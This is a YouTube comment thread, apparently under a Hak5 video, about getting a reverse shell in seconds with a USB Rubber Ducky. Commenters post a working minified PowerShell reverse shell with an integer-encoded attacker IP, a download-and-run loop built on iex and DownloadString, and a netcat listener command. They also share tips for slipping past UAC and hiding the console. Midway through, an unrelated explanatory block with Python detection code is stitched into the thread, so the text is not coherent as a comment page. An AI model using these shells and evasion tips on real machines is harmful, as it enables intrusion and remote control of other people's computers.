Just a tip for anyone that may run into this issue like I have: When you write Ducky code to run CMD (or whatever you choose to open with the RUN command) and simulate the 'ALT + Y' key combination to select the 'Yes' button on the UAC dialog prompt, it's a good idea to follow up on the next line with a 'BACKSPACE' keystroke in the chance you're deploying onto a user's machine that has his/her UAC turned off. Otherwise, if you don't account for UAC being disabled, your first line of code typed into the CMD window will be prefixed with a 'y' character leading off (which of course throws an error and renders the whole payload useless). Pressing backspace as the first key press on a machine that does have UAC enabled will effectively do nothing at all since there's nothing to delete. It's a win-win and you don't have to deal with the irony of your attack being thwarted by someone who has disabled a feature meant to make them safer. It's like leaving your front door open only to have a thief knock himself out cold by walking into the knife edge of the opened door. Haha >.
@mitchb77 8 years ago
Chris Evans, you legend! I have been getting "y mode is not a recognised command". Thanks for the info.
@Cevans3535 8 years ago
Mitch Maguny Awesome! Glad it helped. Just a note: Pressing CTRL + C is actually quicker and easier than pressing Left Arrow + Delete. But either one works ;)
@mitchb77 8 years ago
Chris Evans So the next line literally reads CTRL + C ?
@Cevans3535 8 years ago
Mitch Maguny It would literally read CTRL C (if you're talking about the ducky code format). Here's an example screenshot of what that section of code would look like: i.gyazo.com/a295f2c5e4c46ae1c57767e95e516c4f.png
@mitchb77 8 years ago
Ok, thanks for that. I have only managed to get 2 scripts working so far. I have issues with the twin duck saving files to my drive.
@slipdipvirtualboxgaming8030 6 years ago
1 sticker = +0.3 CPU cores
@m4gg197 5 years ago
So this guy has ca. 9999999 CPUs? 😂🤘🏼
@skselim8536 3 years ago
Lol😂
@kubakaktus_ 3 years ago
Don't buy stickers :D Just download more RAM LOL. Or RGB 1 led +2 gpu and + 999999999 fps
@Daffyclient 3 years ago
@@kubakaktus_ big brain time
@Rheaded 1 year ago
Sending stickers
@0dayCTF 4 years ago
Always run your listener with (nc -lvnp 8080), so you know you got the incoming connection. It enables verbose mode.
@megadave6685 2 months ago
Agree, that's how I do it too
@lordgarth1 8 years ago
I can't help being distracted by the button presses to change cameras.
@CassianoCalegari 8 years ago
You made me realize it, can't stop paying attention to it now.
@shixxx8 8 years ago
Lol me too, I was noticing this 😁
@thecalabiyaumanifold 7 years ago
but if he's shooting all this live with no post production editing.. mad props.
@bakralkarawi9977 7 years ago
Same XD
@fantasaicproductions7612 7 years ago
It's so cool, right!??!!
@lovetodaylivetommorow2861 8 years ago
"These hacker stickers make it go faster" -Darren Loooooool
@Stixes 8 years ago
Got the single stage payload down to a 256 char run command. \o/
@anythingandeverything264 5 years ago
Cool! Please share!
@RetemVictor 8 years ago
Denver is at 5280 and that airport is a circus of madness did you catch the crazy apocalypse mural in the concors...
@hak5 8 years ago
YES! In fact, I'm going to post some videos of it on my personal youtube page soon... That place was SO WEIRD. - Shannon (kzbin.info)
@Sifar_Secure 8 years ago
Shannon Morse is the best example of nominative determinism I have seen in quite a while!
@projectcity8964 8 years ago
You two ROCK. I love every one of your videos. Keep it up.
@hak5 8 years ago
Thank you!
@danmustache7599 7 years ago
You are welcome. Any time I can help out.
@tomwimmenhove4652 5 years ago
I didn't know about the php -S thing. Neat!
@nullbyte8753 4 years ago
❤️😁 The problem is that it takes a long time 😁 The best thing, better than the Rubber Ducky, is reverse engineering using Java and Firebase 😊 I will finish it soon, God willing 😁 . The Rubber Ducky scares the user; most users are afraid of the emulator window. Honestly, I have been following the Hak5 channel for 4 years and it is one of my best sources on the internet, and after the hak5 channel, project 313, and after that two nice channels 😁❤️ am very thankful 🙏 to know you guys 😁❤️ from iraq
@superfatunicorn4758 8 years ago
when doing this the powershell window stays open, and when closed it closes the session. Is this normal, and if so, can we change the script of the powershell to change this?
@uniquelycommon2244 8 years ago
Very good stuff. And the Powershell-script-download-based tactic you show here is a lot more useful, from a practical standpoint, than the Mr. Robot-featured Rubber Ducky attack that you made a vid on a few weeks ago. This doesn't require the logged-in user having admin privileges, and it gets you a shell (from which you can try to do anything you like, including trying to find a way to eventually elevate your privileges to admin and then dump credential hashes). A suggestion: it would be really neat to see a vid where you use a Powershell script along with Empire, Metasploit, or another tool to install a *persisting* backdoor that gets restarted each time a user logs in and periodically reaches back to your server on a schedule of your liking to create a reverse shell or get instructions.
@DavidBusby 8 years ago
`sudo python -m SimpleHTTPServer 80` serves the current directory (`pwd` so you'll need to `cd` first), alternative to the php command as most distros are likely to already have python installed
@muhammadsyihanzhafiri4245 5 years ago
"python -m SimpleHTTPServer "
@shino2366 4 years ago
u can completely hide the CMD prompt from showing up by opening up a separate window using ctrl+win+d and once the CMD is executed, u can go back to the window and delete it... and since going back and deleting will only take like milliseconds... it won't be mostly noticeable...
@NodePoint 8 years ago
If you want to go mobile with Netcat, on Android you can use the netcat binary that comes with Busybox (if it's installed, that is).
@JoshuaPritt 8 years ago
OMG thanks to your shirt I just realized that the toor in toorcon is root spelled backwards. I'm ashamed I didn't figure that out sooner. it might also help to actually go or look more into it.
@davidlee50 2 years ago
I kinda wish HaK5 would sell the bare minimum Tablet/Portable PC, but make it plug n play style. Branch Out and Expand HaK5!
@ChunkyChest 8 years ago
ty .. using a Win32 API call to AttachConsole() + a WScript.Shell object ( see MSDN for docs on both ) with the Write method would allow you to exec a command stream more reliably and covertly ( unless that's what you're doing already ). If not, the problem you can run into is needing to keep the console focused. The upside is Powershell can instantiate shell objects and make Win32 API calls ;).
@LeoTakacs 7 years ago
Command Prompt has actually been around since Windows 2000 because Windows 2000 was the first version of Windows to be based on the NT kernel and not the win9x kernel. All win9x versions of Windows were essentially running on top of MS-DOS, and 2000 and newer were NOT based upon MS-DOS, that's why cmd.exe exists in those OS's.
@ceticx 4 years ago
is there a place to download the 20 second, first script they used at 5:00. i cant find it on their website/the rest of the internet
@lebouski 8 years ago
you guys rock....thanks for the tetra , turtle and ducky....helped change my life !
@Jan.- 7 years ago
How to change the keyboard layout from Arduino Mini (Pro Micro) to QWERTZ ? have problems with german (QWERTZ) keyboard layouts :c
@TopGamingStudio 8 years ago
should I get a Raspberry Pi 3 for kali linux?
@brockbain8656 8 years ago
TopGamingStudio any Pi will work, then again so will a USB jammed in a laptop with persistence
@o0julek0o 8 years ago
that's what she said
@TopGamingStudio 8 years ago
yes but I will be testing websites vulnerabilities and I'm just wondering will it be fast enough? to do anything
@gonespral 8 years ago
a persistence usb with Kali installed might be a better idea
@brockbain8656 8 years ago
MrX Would still beat most of the rPi models...
@judgesh 8 years ago
The only thing I see wrong with this is the problem with it not running as administrator. You'd need to have that same ~3 second delay to run powershell StartProcess powershell -verb RunAs then continue with downloading the PS script.
@Latrocinium086 1 year ago
Man miss these episodes
@kevinrenn6611 4 years ago
I've searched the comments for anything pertaining towards my question but can't seem to find anything! So it seems that this method relies on two conditions being true 1. The user or victim must be logged in 2. The domain this victim is connected to isn't enforcing some sort of group policy (GPO is very common amongst any competent tech team) My question is how can one install netcat on the victim machine if the target does not have any sort of admin privileges for that particular user due to GPO.
@goopey7-intros43 8 years ago
Anyone know where to get Darren's T-Shirt?
@rollo4127 6 years ago
what linux distro are you using
@GhostsPlace 7 years ago
You could create a new virtual desktop or workspace (I'm not sure how it's called in windows) to hide a window
@baiqing 8 years ago
Just use the back doors factory, social engineering tools and host the reverse shell payload. It would be a Meterpreter shell that bypasses Antivirus.
@karlbergen6826 5 years ago
I've seen a number of videos on reverse shell. Could they be used to fix a computer with a software problem since you can see everything on it? Could they be used to modify a computer such as to install a working new operating system?
@skuldug1250 4 years ago
Of course not. The reverse shell is running as long as the box is connected to the internet and is constantly running the backdoor. It's not possible to install a new OS as you have to 1) go into bootloader 2) get onto the new OS and then install the OS into bootloader and drive partition. This process will involve rebooting, OS switching, to the point where you cannot use an internet-based reverse shell to do it, and the program will have to be installed anew on the *nix OS or whatever OS you would like even if you tried to actually pull it off. That means you'd probably have to flash a new script for the *nix system. Long story short, it isn't going to work.
@karlbergen6826 4 years ago
@@skuldug1250 Your comment is interesting. Question: Could the reverse shell order an attack computer to shutdown or do a changeroot?
@skuldug1250 4 years ago
@@karlbergen6826 shutdown should work. chroot is a *nix operation, it's not (afaik) natively possible on windows but I also don't see the benefits of it -- what would be your goal?
@jonit7255 7 years ago
@gain, thank you for all this information. yall always present the info in ways I can keep attention... thank U
@MAP-SLAM 3 years ago
I love the energy, you guys are so fun to watch, cool guys doing cool stuff
@cursedmale7490 3 years ago
How about just enabling remote desktop, new admin user and slowing in firewall. Done and no code for defender to hit on.
@thedosiusdreamtwister1546 8 years ago
I managed to get the script down to 258 characters. Everything was going smoothly until I remembered "Oh yeah, you have to invoke powershell in there as well." Back up to 269 we go. Failsauce. Anyway, here's the shortened script:
nal f New-Object;$s=(f Net.Sockets.TCPClient(4294967295,8)).GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne0){;$d=(f Text.UTF8Encoding).GetString($b,0,$i);$t=([text.encoding]::UTF8).GetBytes((iex $d 2>&1));$s.Write($t,0,$t.Length)}
converted variable names from 2 characters to 1 (10 characters)
deleted unnecessary white spaces (2 characters)
converted ip address to a 64 bit integer and removed the quotes ( (o1*2^24)+(o2*2^16)+(o3*2^8)+(o4) ) (7 characters)
moved to port 8 (3 characters)
switched to utf-8 encoding (2 characters)
created alias f for new-object (1 character)
BTW: The character cap on the windows run box is actually only 259 characters.
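The comment above swaps the dotted address for its integer value, which hides it from a plain string search of logged command lines. The Python below is an added example (not code from the commenter or from Hak5) that reverses that formula and normalizes the address found in a `Net.Sockets.TCPClient(...)` call; the function names and the sample command lines are constructed for illustration.

```python
import ipaddress
import re

# Matches Net.Sockets.TCPClient(<host>,<port>), with or without quotes around
# the host, however New-Object itself has been aliased.
TCPCLIENT_RE = re.compile(
    r"Net\.Sockets\.TCPClient\(\s*(?P<q>['\"]?)(?P<host>[^,'\")\s]+)(?P=q)"
    r"\s*,\s*(?P<port>\d+)\s*\)",
    re.IGNORECASE,
)


def int_to_ipv4(value):
    """Invert (o1*2^24)+(o2*2^16)+(o3*2^8)+(o4); None if outside 32 bits."""
    if not 0 <= value <= 0xFFFFFFFF:
        return None
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def normalize_host(host):
    """Dotted quad for a decimal, hex or dotted IPv4 literal; None otherwise."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", host):
        return int_to_ipv4(int(host, 16))
    if re.fullmatch(r"[0-9]+", host):
        return int_to_ipv4(int(host))
    try:
        return str(ipaddress.IPv4Address(host))
    except ipaddress.AddressValueError:
        return None  # a hostname or malformed literal, left for other checks


def extract_endpoints(command_line):
    """Return one dict per TCPClient call found in a logged command line."""
    endpoints = []
    for match in TCPCLIENT_RE.finditer(command_line):
        raw = match.group("host")
        ip = normalize_host(raw)
        endpoints.append({
            "raw_host": raw,
            "ip": ip,
            "port": int(match.group("port")),
            # True when the address was written as something other than a dotted quad
            "integer_encoded": ip is not None and ip != raw,
        })
    return endpoints


# Constructed sample command lines (not taken from any real log); 192.0.2.10 is
# a documentation address and 3221225994 / 0xC000020A are its integer forms.
SAMPLE_COMMAND_LINES = [
    'powershell -c "nal f New-Object;$s=(f Net.Sockets.TCPClient(3221225994,8)).GetStream()"',
    "powershell -c \"$c=New-Object Net.Sockets.TCPClient('192.0.2.10',8080)\"",
    'powershell -c "$c=New-Object net.sockets.tcpclient(0xC000020A,443)"',
    'powershell -c "Get-ChildItem C:\\Users"',
]


def triage(lines):
    """Pair each line number with the endpoints decoded from that line."""
    return [(n, ep) for n, line in enumerate(lines) for ep in extract_endpoints(line)]


if __name__ == "__main__":
    for n, ep in triage(SAMPLE_COMMAND_LINES):
        print(n, ep)
```

Matching on the normalized address lets one blocklist or allowlist entry cover every spelling of the same endpoint.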
@someyounggamer 7 years ago
That shirt is a must!
@septim2315 5 years ago
-Reverse shell in 3 seconds -Video is 1331 seconds long 😑
@icarusswitkes986 5 years ago
r/theydidthemath
@cubicardi8011 4 years ago
I don't think you'd want a 3 second video. Even a 30 s video would be terrible
@atanki5682 4 years ago
you don't really want a 3 second video "-_-"
@etf_da12bt91 1 year ago
So once the command is run and terminal is open on windows system how do you make that either not viewable or make the power shell close?
@Darkl0ud_Productions 8 years ago
is shannon using a mini laptop? what is it
@redslashed 3 years ago
I love your channel so much😍😍
@sundz5899 8 years ago
what laptops do they use?
@over00lordunknown12 6 years ago
10:15 *YOU DON'T NEED ACCESS TO THE **_RUN_** DIALOG BOX!!! JUST TYPE IT INTO THE START MENU!* Why do they ALWAYS do that?!...
@djAmored 8 years ago
What laptop are you using for linux?
@joaofilipedelgado 7 years ago
Hi Daren if you want a pretty shell just do the same for the meterpreter shell and it's more or less the same time
@dominikkisiel6945 2 years ago
Does the usb duck have to be permanently in the usb socket of the second computer during the connection or is it enough to insert it for a while while the script is loaded?
@licklake1 8 years ago
What notebook is darren using?
@gvecc3472 8 years ago
Looks like a Dell XPS 13
@gonespral 8 years ago
Looks like a Dell XPS 13
@msven 8 years ago
Not sure why people are saying "Looks like".....7:50 Either Darren is a troll or he named his laptop "xps13" because it is an XPS 13......
@gonespral 8 years ago
m sven because it looks like it
@msven 8 years ago
Gon Nespral I was being a little snarky....
@cwbh10 8 years ago
i made this 0.5 seconds
@KeyChainer 8 years ago
Kryštof Píštěk it really depends on target computer. I don't know about 0.5 seconds, but lowering the initial delay is possible.
@sleazymcyeazy7892 7 years ago
0.1
@atanki5682 5 years ago
0.0 hehehehehe jk
@userou-ig1ze 5 years ago
how?
@ananta2178 4 years ago
Hahaha
@phreaklulz 8 years ago
I love the USB Ducky, But the only problem I have is the driver load time on a lot of machines, being a simple HID device, I didn't think it would have to search windows update for a driver and download it, please if there is a bypass to make the install faster let me know!
@sharpfang 6 years ago
If you make this a generic keyboard, the driver should already be there.
@TopGamingStudio 8 years ago
Also how can i get access to hidden directories.
@RchardSleeth 3 years ago
Thoughts : jpeg with embedded nano script utilizing the single stage reverse power shell script?
@shmuelchazan 8 years ago
Can't you just download the command to run?
$output = ''; while($true) { $output = iex (New-Object Net.WebClient).DownloadString("0.0.0.0/get_command_to_run.php?o=$output") }
get_command_to_run.php will prompt the user for a command to run and then print it. Then, powershell will receive that and run it. Then somehow send back the output as a parameter to the php script (I hope I did it ok, I don't know powershell).
@menzis0 7 years ago
i think the point is not doing things over network but the admin user actually creating the files 'themselves'. Syntax looks about right.
@fss1704 7 years ago
+mikrobx you can encrypt that with vigenére algorithm easily and send it through the network, antivirus can mostly detect sha256 decompression header, vigenére uses only an or.
@socrates0ne 8 years ago
I'm pretty sure you're just joking, but if anyone is interested "faster" and "more intense" were directions George Lucas gave in the original star wars movie. He did it so much that the crew turned it into a running joke. I think they may have even made signs for Lucas, one saying "faster" and the other saying "more intense".
@pingpong1138 8 years ago
The powershell window never goes away which really gives it away, even if you hide it in the corner. This seems really good if all you want to do is use it to put a more stable reverse shell on it or grab one quick file.
@googlemail369 2 years ago
There is a powershell command to execute files but with the -hiddenWindow arg it will launch without a window.
@richoffremo461 2 years ago
@@googlemail369 you gotta telegram or discord? Id like to ask a couple questions bout this if you don’t mind.
@Shoe_On_Head 2 years ago
@@googlemail369 thanks to window header libs, was able to implement same in a cpp payload
@megadave6685 2 months ago
@@googlemail369 can you tell me more about -hiddenWindow please?
@xugestory 5 years ago
Will this give us consistent access to the computer ? Or just once?
@bruhminator8459 5 years ago
when you want to buy a sticker for 2:50 but it costs 40$ shipping
@PeterPan-fl1lp 4 years ago
Ok I’m using nc on my macOS Catalina terminal using the command nc -l -p 8080 . I get the error no: missing port with option -l. Any ideas on what could be going wrong?
@alemdomas 2 years ago
Congratulations !!! Made In Brazil - :-)
@xetronchan1059 7 years ago
If we use the faster way, it needs to download something from a website (in this video Darren's PHP server), which is a concern that already stated at the very beginning of the video isn't it? So if I understand correctly this means we can't get both advantage of high-injection-speed and high-success-chance right? Its a trade-off like, either 1)I sacrifice chance of success by having fast injection through downloading PS script, or 2) do this without downloading the PS script to have a higher chance, but with slower-injection.
@andropchax3846 8 years ago
FASTER AND MORE INTENSE!!! xD
@JonMichaelDeBona 6 years ago
That's what she said.
@KenDogNI 8 years ago
SMA sockets on a tin box is good, gives the RF signal a better ground plane..
@rishikreddy4526 4 years ago
video title : How to Get a Reverse Shell in *3 Seconds* with the USB Rubber Ducky video time : 22 minutes, 11 seconds. me : BURH -_-
@salacryl 2 years ago
Question: How does this work if powershell is in Constrained Language mode?
@aakashjana6225 5 years ago
Will use rubber ducky work if used is blocked on the computer??
@a.a1940 3 years ago
Can I use an autorun usb with power shell scripts
@lewis1902 6 years ago
...and what might you do if Run is disabled?
@inspirationeveryday1175 3 years ago
what is the importance of getting a reverse shell?
@KennySpark8574 2 years ago
Where can you get this payload?
@leocapuzzi 4 years ago
Cool to see that Chad Kroeger finally gave up on Nickelback
@goopey7-intros43 8 years ago
Did this faster than the speed of light
@xxrobloxprogamerxx180 3 years ago
No the light speed isn't a time measure stupid imagine being a remote access trojan
@over00lordunknown12 6 years ago
*So I have a question:* If you don't have access to admin CMD, you can just use regular and write it to the user or temp directory, right? Okay, then, the firewall might block it, but if it is just communicating on the LAN, then the network is set to "Trusted" by default, right? So no privileges needed?
@badpixelproductions8437 8 years ago
would using msfvenom to make a payload, and then emailing it to the victim via a fake email account, and then using the msfconsole to use an exploit to the activate the payload be practical?
@Fractal227 8 years ago
Faster and more intense. Put some rubber on it(^.-) (-.^) (^.^) On another note, how would you connect to the reverse shell? What would you define as your end point. Sending it directly to your own equipment at your house isn't very sneaky, so if we think "bad hackers" here. Would you then use a "borrowed" credit card to connect to some encrypted GSM equipment paid with that card and forward the connection to yourself or what ideas comes to mind?
@kornbread5359 4 years ago
Do ports exist physically or are they just software mechanisms?
@skuldug1250 4 years ago
Well, sure, you have USB ports and such. But mainly ports are pretty much "addresses"/communication endpoints which apps can listen on (which means that when packets arrive dedicated to a specific port they get easily forwarded to the application listening on the port). So 80 is the standard port for internet traffic, and a packet traveling over the internet would have xxx.xxx.xxx.xx:80 as the destination. In fact, if you were to use an encrypted reverse shell, setting it to port 80 is a great idea because that port is always open, and the encrypted binaries just look like random passing by data. Very sneaky...
@fsnd7954 3 years ago
can i make my flash drive to be usb rubber ducky ? if yes can u give me a link to a paper or information like that
@rmp5s 7 years ago
What is that thing Shannon is on?
@chloealaska3140 3 years ago
What laptop do you use?
@baiqing 7 years ago
You could use the social engineering toolkit "SET" and setup a reverse https meterpreter shell.
@williamcornell3599 7 years ago
if stickers make it faster, then I need a lot of them
@WeirdWolf 8 years ago
Does somebody know how to utilize the Ducky on an Android phone? None of the payloads i found work for me, neither do any shortcuts for physical keyboards connected to Android. If anybody has a working payload for Android (any kind really), would you mind pointing me to it? Or did Android remove some HID functionality in any newer version?
@sharpfang 6 years ago
First, attach the ducky through a USB OTG adapter or you achieve nothing connecting USB slave to USB slave. Then, Android doesn't provide neat keyboard shortcuts. You may have your ducky emulate a keyboard and a mouse, and use the mouse to click things... except every phone will have things elsewhere as people install different things and the icons are in random places. Your best bet is to emulate a USB to serial converter, hope the phone has debug options enabled (or try enabling them through mouse clicks) and use ADB shell that will then appear over USB-as-RS232
@rasprosecutor 8 years ago
First computerphile puts out a video about malware, then you guys? Now you're making me want to get back into the hacking game...
@chrislavers7726 7 years ago
Heya, I rly want to do this to prank my friend but I am scared I am going to damage my friends laptop. Is there a way where I can remove the reverse shell on his pc, if so can I do it remotely ?
@nagarathnagopal6898 3 years ago
Can u make a video on hiding payloads in image files for reverse shell
@m.whitmore1974 7 years ago
Ok, where did he get the shirt? I got to get one.
@tracash6682 3 years ago
RICKROLL YOUR CLASSROOM WITH THIS
@williamcornell3599 7 years ago
what is that clamshell thing Shannon has?
@jwadaow 5 years ago
lol
@CallousCoder 2 years ago
Only Darren, GenX and Boomer programmers know the pain of squeezing out bytes in your code to make it fit 😅 I love those days where you had to think about cycles and/or memory usage. Even though 64K was enormous!
@jasonperry6046 8 years ago
Disk OS...... What happened to dirty operating system
@fstfstsolutionsrl7616 5 years ago
I bought the duck and with the taxes and the tax I spent € 100.00 fixed red led light, I looked on their help site and I didn't solve it, I asked them for help via email, but only one answer they gave me saying that I would have contacted the assistance service .... € ... 100.00 thrown away. thank you
@madscientist057 5 years ago
Aren't these power shell scripts mitigated by a good group policy that prevents users from running power shell let alone that downloadstring command
@BicospaceTech 2 years ago
you guys so dope !!
@sebasq109 6 years ago
What is the JAVA -jar XXXX command for?
@mertkocer2507 2 years ago
could someone help with the r.ps1 part i cant host it
@Aralmo640 3 years ago
Nice! I did something similar with an arduino nano iot with a led screen to "hack" wifi passwords easily. I would connect it to usb and use it as a keyboard to get the current connected wifi, list the password with key clear and send it back through COM to be shown in the LCD. Just for the fun of seeing your friends face when you ask to connect to the wifi and instead of asking for the key you ask to connect that stuff full of dupont cables in a test board to the USB to get it XDDDDDD
@valentinnavarro2965 6 years ago
I need to compile a duckyscript txt file that I wrote originally for my USB Rubber Ducky. But now I need to find a way to run the script as an exe file locally. How can I make this possible? How can I compile the script to an exe file?
@Hello-ih4rn 8 years ago
Couldn't you just create the executable from typing the text you would get if you would have opened it in notepad?
@ghost-x8h 5 years ago
Haha I always rep and tag you guys on social media for thousands and thousands to see 😊 I would scream in excitement if I ever won anything from you guys 😂
@hack-talk9098 2 years ago
Why should you pre-install the setup when you need to take us through
@insanemainstream3633 3 years ago
Any advice on a good reliable Linux laptop? Needs to be portable. ty all
@noyes6758 3 years ago
Any windows works because of its wsl feature which is like a less laggy vm. Otherwise, idk a laptop, just get one with ubuntu if it’s gonna be a day to day use, and get kali for pentesting
@DanielPradoBurgos 8 years ago
Awesome channel!!! Keep it up! And btw.... Y U NO USE VIM??? :P